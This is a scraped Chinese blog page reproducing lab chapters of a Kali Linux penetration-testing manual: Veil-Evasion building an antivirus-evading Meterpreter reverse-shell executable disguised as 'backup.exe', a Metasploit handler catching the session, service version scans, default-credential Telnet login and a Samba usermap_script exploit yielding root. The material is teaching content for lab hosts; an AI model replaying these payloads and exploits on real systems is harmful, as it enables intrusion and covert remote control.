    • =========================================================================

    • Main Menu

    •          24 payloads loaded

    • Available commands:

    •          use            use a specific payload

    •          info             information on a specific payload

    •          list               list available payloads

    •          update         update Veil to the latest version

    •          clean           clean out payload folders

    •          checkvt         check payload hashes vs. VirusTotal

    •          exit              exit Veil

    • [>] Please enter a command:

    从以上信息中可以看到在Veil下,有24个攻击载荷可加载,并列出了可用的命令。现在就可以进行各种操作了。例如查看可加载的攻击模块,执行命令如下所示:

    • [>] Please enter a command: list

    • =========================================================================

    •  Veil-Evasion | [Version]: 2.4.3

    • =========================================================================

    •  [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

    • =========================================================================

    • [*] Available payloads:

    •          1)      c/meterpreter/rev_tcp  

    •          2)      c/meterpreter/rev_tcp_service

    •          3)      c/shellcode_inject/virtual

    •          4)      c/shellcode_inject/void

    •          5)      cs/meterpreter/rev_tcp 

    •          6)      cs/shellcode_inject/base64_substitution

    •          7)      cs/shellcode_inject/virtual

    •          8)      native/Hyperion        

    •          9)      native/backdoor_factory

    •          10)   native/pe_scrambler    

    •          11)   powershell/shellcode_inject/download_virtual

    •          12)   powershell/shellcode_inject/psexec_virtual

    •          13)   powershell/shellcode_inject/virtual

    •          14)   python/meterpreter/rev_http

    •          15)   python/meterpreter/rev_http_contained

    •          16)   python/meterpreter/rev_https

    •          17)   python/meterpreter/rev_https_contained

    •          18)   python/meterpreter/rev_tcp

    •          19)   python/shellcode_inject/aes_encrypt

    •          20)   python/shellcode_inject/arc_encrypt

    •          21)   python/shellcode_inject/base64_substitution

    •          22)   python/shellcode_inject/des_encrypt

    •          23)   python/shellcode_inject/flat

    •          24)   python/shellcode_inject/letter_substitution

    从输出的信息中,可以看到有24个可用的攻击载荷。此时可以利用任何一个攻击载荷,进行渗透攻击。

    【实例4-9】演示使用Veil工具中的载荷(本例以cs/meterpreter/rev_tcp为例),进行渗透攻击(这里以Windows 7作为攻击靶机)。具体操作步骤如下所示:

    1)启动Veil工具。执行命令如下所示:

    • root@kali:~# veil-evasion

    执行以上命令后,将显示如下所示的信息:

    • =========================================================================

    •  Veil-Evasion | [Version]: 2.4.3

    • =========================================================================

    •  [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

    • =========================================================================

    • Main Menu

    •          24 payloads loaded

    • Available commands:

    •          use            use a specific payload

    •          info             information on a specific payload

    •          list               list available payloads

    •          update         update Veil to the latest version

    •          clean           clean out payload folders

    •          checkvt         check payload hashes vs. VirusTotal

    •          exit              exit Veil

    • [>] Please enter a command:

    在输出的信息中看到[>] Please enter a command:提示符,就表示Veil登录成功了。

    2)选择cs/meterpreter/rev_tcp攻击载荷。在攻击载荷列表中,cs/meterpreter/rev_tcp载荷的编号是5。执行命令如下所示:

    • [>] Please enter a command: use 5

    • =========================================================================

    •  Veil-Evasion | [Version]: 2.4.3

    • =========================================================================

    •  [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

    • =========================================================================

    • Payload: cs/meterpreter/rev_tcp loaded

    • Required Options:

    • Name                          Current Value   Description

    •  ----                              -------------           ---------------------------------------

    •  LHOST                               IP of the metasploit handler

    •  LPORT                     4444    Port of the metasploit handler

    •  compile_to_exe             Y         Compile to an executable

    • Available commands:

    •          set              set a specific option value

    •          info             show information about the payload

    •          generate        generate payload

    •          back           go to the main menu

    •          exit              exit Veil

    •  [>] Please enter a command:

    输出信息显示了rev_tcp攻击载荷可配置的选项参数。这里默认指定的本地端口(LPORT)是4444LHOST选项还没有配置。

    3)配置LHOST选项参数,并查看攻击载荷的详细信息。执行命令如下所示:

    • [>] Please enter a command: set LHOST 192.168.6.103

    • [>] Please enter a command: info

    • =========================================================================

    •  Veil-Evasion | [Version]: 2.4.3

    • =========================================================================

    •  [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

    • =========================================================================

    • Payload information:

    •        Name:                cs/meterpreter/rev_tcp

    •        Language:        cs

    •        Rating:               Excellent

    •        Description:    pure windows/meterpreter/reverse_tcp stager, no

    •                        shellcode

    • Required Options:

    • Name                        Current Value         Description

    •  ----                                 -----------------        ------------------------------------------

    •  LHOST           192.168.6.100        IP of the metasploit handler

    •  LPORT           4444                      Port of the metasploit handler

    •  compile_to_exe            Y                          Compile to an executable

    从输出的信息中,可以看到rev_tcp攻击载荷的详细信息,如攻击载荷名、语言、级别及配置的选项参数等。

    4)此时,使用generate命令生成载荷文件。执行命令如下所示:

    •  [>] Please enter a command: generate

    • =========================================================================

    •  Veil-Evasion | [Version]: 2.4.3

    • =========================================================================

    •  [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

    • =========================================================================

    • [*] Press [enter] for 'payload'

    •  [>] Please enter the base name for output files: backup                                       #指定输出文件名

    在以上命令中指定一个文件名为backup。然后按下回车键,将显示如下所示的信息:

    •  [*] Executable written to: /root/veil-output/compiled/backup.exe

    • Language:                         cs

    •  Payload:                             cs/meterpreter/rev_tcp

    •  Required Options:      LHOST=192.168.6.103  LPORT=4444  compile_to_exe=Y

    •  Payload File:                     /root/veil-output/source/backup.cs

    •  Handler File:                     /root/veil-output/handlers/backup_handler.rc

    • [*] Your payload files have been generated, don't get caught!

    •  [!] And don't submit samples to any online scanner! ;)

    • [>] press any key to return to the main menu:

    从输出的信息中可以看到生成一个可执行文件backup.exe,并且该文件保存在/root/veil-output/compiled/中。此时将可执行文件backup.exe发送到目标主机上,就可以利用该攻击载荷了。

    接下来需要使用Metasploit创建一个远程处理器,等待目标主机连接到Kali Linux(攻击主机)操作系统。连接成功后,就获取到一个远程Shell命令。

    【实例4-10创建远程处理器。具体操作步骤如下所示:

    1)启动MSF终端。

    2)使用handler模块。执行命令如下所示:

    • msf > use exploit/multi/handler

    3)加载reverse_tcp攻击载荷,并设置其选项参数。执行命令如下所示:

    • msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

    • payload => windows/meterpreter/reverse_tcp

    • msf exploit(handler) > set LHOST 192.168.6.103

    • LHOST => 192.168.6.103

    4启动渗透攻击。执行命令如下所示:

    • msf exploit(handler) > exploit

    • [*] Started reverse handler on 192.168.6.103:4444

    • [*] Starting the payload handler...

    从输出信息可以看到攻击载荷已启动,正在等待连接目标主机。

    此时将前面生成的可执行文件backup.exe发送到目标主机(Windows 7),并运行该可执行文件。然后返回到Kali Linux操作系统,将看到如下所示的信息:

    • [*] Sending stage (769536 bytes) to 192.168.6.110

    • [*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.110:2478) at 2014-07-17 10:44:47 +0800

    • meterpreter >

    从以上信息中,可以看到成功打开了一个Meterpreter会话。这表示已成功渗透攻击目标主机,现在就可以进行一些Shell命令。如进行目标主机的Shell环境,执行命令如下所示:

    • meterpreter > shell

    • Process 1544 created.

    • Channel 1 created.

    • Microsoft Windows [ 6.1.7601]

    • ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ

    • C:\Users\bob\Desktop>

    输出的信息表示进入了目标系统Windows 7的命令行,并且当前目标系统登录的用户是bob

    本文选自:Kail Linux渗透测试实训手册大学霸内部资料,转载请注明出处,尊重技术尊重IT人!


    展开全文
  • Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器。使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络的服务信息。本节将介绍使用Metasploit中的...

    Kail Linux渗透测试教程之在Metasploit中扫描

    在Metasploit中扫描

    在Metasploit中,附带了大量的内置扫描器。使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络的服务信息。本节将介绍使用Metasploit中的辅助模块实现扫描。

    【实例4-4】在Metasploit中,扫描目标主机。具体操作步骤如下所示:

    (1)启动MSF终端。执行命令如下所示:

    root@kali:~# msfconsole

    msf>

    (2)搜索所有可用的扫描模块。执行命令如下所示:

    msf > search scanner

    Matching Modules

    ================

       Name                                 Disclosure Date     Rank           Description

       ----                                    --------------------    -----------  ---------------------------------------------

       auxiliary/admin/smb/check_dir_file                             normal  SMB Scanner Check File/Directory Utility

       auxiliary/bnat/bnat_scan                                       normal  BNAT Scanner

       auxiliary/gather/citrix_published_applications                  normal  Citrix MetaFrame ICA Published Applications Scanner

       auxiliary/gather/enum_dns                                     normal  DNS Record Scanner and Enumerator

       auxiliary/gather/natpmp_external_address                      normal  NAT-PMP External Address Scanner

       auxiliary/gather/windows_deployment_services_shares        normal  Microsoft Windows Deployment Services Unattend Gatherer

       auxiliary/pro/nexpose                                         normal  PRO: Nexpose Scanner Integration

       auxiliary/pro/webscan                                          normal  PRO: Web Application Scanner

       auxiliary/scanner/afp/afp_login                                 normal  Apple Filing Protocol Login Utility

       auxiliary/scanner/afp/afp_server_info                                     normal  Apple Filing Protocol Info Enumerator

       auxiliary/scanner/backdoor/energizer_duo_detect              normal  Energizer DUO Trojan Scanner

       auxiliary/scanner/chargen/chargen_probe     1996-02-08       normal  Chargen Probe Utility

    输出信息显示了,Metasploit中所有可用的扫描模块。这些模块针对各种类型的服务。这里为了缩小查看的范围,搜索SSH服务的扫描模块。

    (3)扫描SSH服务的扫描模块。执行命令如下所示:

    msf > search scanner/ssh

    Matching Modules

    ================

       Name                                     Disclosure Date  Rank    Description

       ----                                         ---------------    -----------  -------------------------------------------

       auxiliary/scanner/ssh/cerberus_sftp_enumusers  2014-05-27 normal     Cerberus FTP Server SFTP Username Enumeration

       auxiliary/scanner/ssh/ssh_enumusers                          normal     SSH Username Enumeration

       auxiliary/scanner/ssh/ssh_identify_pubkeys                                normal     SSH Public Key Acceptance Scanner

       auxiliary/scanner/ssh/ssh_login                              normal     SSH Login Check Scanner

       auxiliary/scanner/ssh/ssh_login_pubkey                       normal     SSH Public Key Login Scanner

       auxiliary/scanner/ssh/ssh_version                            normal     SSH Version Scanner

    输出的信息,显示了几个有效的SSH模块。现在就可以选择相应的模块,进行扫描了。

    (4)使用ssh_version模块扫描SSH服务。执行命令如下所示:

    msf > use auxiliary/scanner/ssh/ssh_version

    (5)查看ssh_version模块下可配置的选项参数。执行命令如下所示:

    msf auxiliary(ssh_version) > show options

    Module options (auxiliary/scanner/ssh/ssh_version):

       Name      Current Setting  Required             Description

       ------------     ---------------     --------      -----------------------------------------------------------------------------

       RHOSTS                             yes       The target address range or CIDR identifier

       RPORT    22                  yes       The target port

       THREADS          1                    yes       The number of concurrent threads

       TIMEOUT                     30                  yes       Timeout for the SSH probe

    输出的信息显示了可配置的模块。从以上结果中,可以看出RHOSTS选项没有配置。

    (6)配置RHOSTS选项。执行命令如下所示:

    msf auxiliary(ssh_version) > set RHOSTS 192.168.6.105

    RHOSTS => 192.168.6.105

    从输出的结果中,可以看到RHOSTS(目标主机地址)选项已经设置为192.168.6.105(Metasploit 2操作系统)。

    (7)启动扫描。执行命令如下所示:

    msf auxiliary(ssh_version) > exploit

    [*] 192.168.6.105:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

    msf auxiliary(ssh_version) >

    从输出的信息中,可以看到目标系统正运行SSH服务,并且版本为SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1。

    【实例4-5】扫描MySQL服务器。具体操作步骤如下所示:

    (1)登录MSF终端。执行命令如下所示:

    root@kali:~# msfconsole

    msf>

    (2)使用mysql_version模块,并查看该模块中可配置的选项参数。执行命令如下所示:

    msf > use auxiliary/scanner/mysql/mysql_version

    msf auxiliary(mysql_version) > show options

    Module options (auxiliary/scanner/mysql/mysql_version):

       Name     Current Setting  Required  Description

       ----     ---------------  --------  -----------

       RHOSTS                    yes       The target address range or CIDR identifier

       RPORT    3306             yes       The target port

       THREADS  1                yes       The number of concurrent threads

    从输出的信息中,可以看到RHOSTS选项没有配置。此时,配置RHOSTS来指定目标主机的地址。

    (3)设置RHOSTS选项,并进行MySQL服务扫描。执行命令如下所示:

    msf auxiliary(mysql_version) > set RHOSTS 192.168.6.105

    RHOSTS => 192.168.6.105

    msf auxiliary(mysql_version) > exploit

    [*] 192.168.6.105:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

    从输出的结果中,可以看到目标主机上正在运行的MySQL版本是5.0.51a。

    【实例4-6】扫描Telnet服务。具体操作步骤如下所示:

    (1)启动MSF终端。执行命令如下所示:

    root@kali:~# msfconsole

    msf>

    (2)使用telnet_version模块,并查看可配置的选项参数。执行命令如下所示:

    msf > use auxiliary/scanner/telnet/telnet_version

    msf auxiliary(telnet_version) > show options

    Module options (auxiliary/scanner/telnet/telnet_version):

       Name      Current Setting  Required    Description

       ----         ---------------     ---------------  -----------------------------------------------------------------------

       PASSWORD                    no        The password for the specified username

       RHOSTS                         yes       The target address range or CIDR identifier

       RPORT             23              yes       The target port

       THREADS         1               yes       The number of concurrent threads

       TIMEOUT           30              yes       Timeout for the Telnet probe

       USERNAME                    no        The username to authenticate as

    从输出的信息中,可以看到有四个必须配置选项。其中三个选项已经配置,现在配置RHOSTS选项。

    (3)配置RHOSTS选项,并启动扫描。执行命令如下所示:

    msf auxiliary(telnet_version) > set RHOSTS 192.168.6.105

    RHOSTS => 192.168.6.105

    msf auxiliary(telnet_version) > exploit

     [*] 192.168.6.105:23 TELNET _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                         \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

    从以上输出的信息,仅看到一堆文本信息。在这些信息中,没有关于Telnet服务的版本信息。但是显示了登录认证信息,Login with msfadmin/msfadmin to get started。从这条信息中,可以获取到目标主机Telnet服务的用户名和密码。此时可以尝试登录。

    (4)登录目标主机的Telnet服务。执行命令如下所示:

    root@kali:~# telnet -l msfadmin 192.168.6.105

    Trying 192.168.6.105...

    Connected to 192.168.6.105.

    Escape character is '^]'.

    Password:                                                                         #输入密码msfadmin

    Last login: Tue Jul  8 06:32:46 EDT 2014 on tty1

    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

    The programs included with the Ubuntu system are free software;

    the exact distribution terms for each program are described in the

    individual files in /usr/share/doc/*/copyright.

    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

    applicable law.

    To access official Ubuntu documentation, please visit:

    http://help.ubuntu.com/

    No mail.

    msfadmin@metasploitable:~$

    以上信息显示了登录Telnet服务的信息。在输出信息中看到msfadmin@metasploitable:~$提示符,则表示成功登录了Telnet服务。此时可以执行一些标准的Linux命令。例如查看多个组的成员,执行命令如下所示:

    msfadmin@metasploitable:~$ id

    uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)

    输出信息中显示了msfadmin用户的相关信息。其中,gid表示groups中第1个组账号为该用户的基本组,groups中的其他组账号为该用户的附加组。

    在Metasploit中,可以扫描一系列地址。下面以扫描Samba服务器为例,介绍扫描一个网络内运行的Samba服务器。首先演示下,扫描单个地址的Samba服务器。

    【实例4-7】演示目标扫描主机地址为192.168.6.105的Samba服务器。具体操作步骤如下所示:

    (1)启动MSF终端。执行命令如下所示:

    root@kali:~# msfconsole

    msf>

    (2)使用smb_version模块,并查看该模块可配置的选项参数。执行命令如下所示:

    msf > use auxiliary/scanner/smb/smb_version

    msf auxiliary(smb_version) > show options

    Module options (auxiliary/scanner/smb/smb_version):

       Name       Current Setting   Required           Description

       ----       ---------------         -----------   -----------------------------------------------------------------------

       RHOSTS                     yes       The target address range or CIDR identifier

       SMBDomain  WORKGROUP    no        The Windows domain to use for authentication

       SMBPass                      no        The password for the specified username

       SMBUser                      no        The username to authenticate as

       THREADS    1                yes       The number of concurrent threads

    (3)配置RHOSTS选项。执行命令如下所示:

    msf auxiliary(smb_version) > set RHOSTS 192.168.6.105

    RHOSTS => 192.168.6.105

    (4)启动扫描。执行命令如下所示:

    msf auxiliary(smb_version) > exploit

    [*] 192.168.6.105:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

    从输出的信息中,可以看到扫描到正在运行的Samba服务器及其版本。

    接下来演示扫描192.168.6.0/24网络内所有运行Sambas服务器的主机。具体操作步骤如下所示:

    (1)选择使用smb_version模块。执行命令如下所示:

    msf > use auxiliary/scanner/smb/smb_version

    (2)配置smb_version模块中可配置的选项参数。执行命令如下所示:

    msf auxiliary(smb_version) > set RHOSTS 192.168.6.0/24

    RHOSTS => 192.168.6.0/24

    msf auxiliary(smb_version) > set THREADS 255

    THREADS => 255

    (3)启动扫描。执行命令如下所示:

    msf auxiliary(smb_version) > exploit

    [*] 192.168.6.106:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:WIN-RKPKQFBLG6C) (domain:WORKGROUP)

    [*] 192.168.6.105:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)

    [*] 192.168.6.104:445 is running Windows XP Service Pack 0 / 1 (language: Chinese - Traditional) (name:LYW) (domain:LYW)

    [*] 192.168.6.110:445 is running Windows XP Service Pack 0 / 1 (language: Chinese - Traditional) (name:AA-886OKJM26FSW) (domain:WORKGROUP)

    [*] Scanned 255 of 256 hosts (099% complete)

    [*] Scanned 256 of 256 hosts (100% complete)

    [*] Auxiliary module execution completed

    从输出的信息中,可以看到192.168.6.0/24网络内有四台主机上正在运行着Samba服务器。在显示的信息中,可以看到运行Samba服务器的操作系统类型。

    【实例4-8】渗透攻击Samba服务器。具体操作步骤如下所示:

    (1)启动MSF终端。执行命令如下所示:

    root@kali:~# msfconsole

    msf>

    (2)搜索usermap模块。执行命令如下所示:

    msf > search samba/usermap

    Matching Modules

    ================

       Name                            Disclosure Date   Rank       Description

       ----                                ---------------     -----------     -----------------------------------------------

       exploit/multi/samba/usermap_script  2007-05-14      excellent  Samba "username map script" Command Execution

    从输出的信息中,可以看到有个usermap模块。

    (3)查看usermap_script模块的详细信息。执行命令如下所示:

    msf > info exploit/multi/samba/usermap_script

           Name: Samba "username map script" Command Execution

         Module: exploit/multi/samba/usermap_script

       Platform: Unix

     Privileged: Yes

        License: Metasploit Framework License (BSD)

           Rank: Excellent

    Provided by:

      jduck <jduck@metasploit.com>

    Available targets:

      Id  Name

      --  ----

      0   Automatic

    Basic options:

      Name   Current Setting  Required  Description

      ----      ---------------       --------    -----------

      RHOST                   yes       The target address

      RPORT  139              yes       The target port

    Payload information:

      Space: 1024

    Description:

      This module exploits a command execution vulerability in Samba

      versions 3.0.20 through 3.0.25rc3 when using the non-default

      "username map script" configuration option. By specifying a username

      containing shell meta characters, attackers can execute arbitrary

      commands. No authentication is needed to exploit this vulnerability

      since this option is used to map usernames prior to authentication!

    References:

      http://cvedetails.com/cve/2007-2447/

      http://www.osvdb.org/34700

      http://www.securityfocus.com/bid/23972

      http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534

      http://samba.org/samba/security/CVE-2007-2447.html

    输出的信息显示了usermap_script模块的详细信息。从输出信息中可以看到,该模块仅需要配置RHOST选项就可以了。这里不需要加载任何攻击载荷,就可以自动使用一个Linux命令Shell。

    (3)选择使用usermap_script模块,并设置RHOST选项。执行命令如下所示:

    msf > use exploit/multi/samba/usermap_script

    msf exploit(usermap_script) > set RHOST 192.168.6.105

    RHOST => 192.168.6.105

    (4)启动渗透攻击。执行命令如下所示:

    msf exploit(usermap_script) > exploit

     [*] Started reverse double handler

    [*] Accepted the first client connection...

    [*] Accepted the second client connection...

    [*] Command: echo IwmN37I0D3cTGJhv;

    [*] Writing to socket A

    [*] Writing to socket B

    [*] Reading from sockets...

    [*] Reading from socket B

    [*] B: "IwmN37I0D3cTGJhv\r\n"

    [*] Matching...

    [*] A is input...

    [*] Command shell session 1 opened (192.168.6.103:4444 -> 192.168.6.105:34848) at 2014-07-16 10:00:59 +0800

    从输出的信息中,可以看到成功的打开了一个会话。这表示已成功攻击了目标主机。此时用户可以执行一些Linux命令,查看目标主机的相关信息。如下所示:

    whoami                                                                     #查看当前登录系统的用户

    root

    从输出的信息中,可以看到当前目标系统登录的用户名是root。如果想了解该用户的详细信息,可以使用id命令查看。如下所示:

    id                                                                                 #查看当前登录用户的信息

    uid=0(root) gid=0(root)

    输出的信息表上root用户属于root组,并且其UID和GID都为0。

    本文选自:Kail Linux渗透测试实训手册大学霸内部资料,转载请注明出处,尊重技术尊重IT人!

    展开全文
  • Kail Linux渗透测试实训手册第3章信息收集
  • linux_kali的实战操作.emmm
  • Kail Linux渗透测试培训手册3第二章信息采集 信息收集是网络攻击中最重要的步骤之一。渗透攻击。我们需要收集各种信息目标。该信息收集。攻击成功的概率越大。介绍信息收集的相关工具。本文选自《Kail Linux渗透測...
  • Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
  • Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
  • Kail Linux渗透测试教程之ARP侦查Netdiscover端口扫描Zenmap与黑暗搜索引擎Shodan ARP侦查工具——Netdiscover Netdiscover是一个主动/被动的ARP侦查工具。该工具在不使用DHCP的无线网络上非常有用。使用...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 873
精华内容 349
关键字:

kaillinux渗透

linux 订阅